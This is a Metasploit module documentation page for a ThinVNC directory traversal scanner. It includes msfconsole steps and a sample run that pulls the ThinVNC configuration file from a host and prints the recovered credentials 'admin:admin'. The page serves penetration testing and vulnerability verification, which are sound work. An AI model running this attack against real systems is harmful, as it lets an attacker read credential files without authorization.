Back to Metasploit Framework

Thinvnc Travesal

documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md

6.4.1311.1 KB
Original Source

Description

This module exploits a directory traversal vulnerability in ThinVNC versions 1.0b1 and prior which allows unauthenticated users to retrieve arbitrary files, including the ThinVNC configuration file.

Vulnerable Application

This module has been tested successfully on ThinVNC versions 1.0b1 and "ThinVNC_Latest" (2018-12-07).

ThinVNC is available on Sourceforge.

Verification Steps

  1. ./msfconsole
  2. use auxiliary/scanner/http/thinvnc_traversal
  3. set rhosts <rhost>
  4. run

Scenarios

ThinVNC version 1.0b1 on Windows XP SP3

msf > use auxiliary/scanner/http/thinvnc_traversal 
msf auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123
rhosts => 172.16.123.123
msf auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20191017033828_default_172.16.123.123_thinvnc.traversa_713640.txt
[+] Found credentials: admin:admin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(scanner/http/thinvnc_traversal) >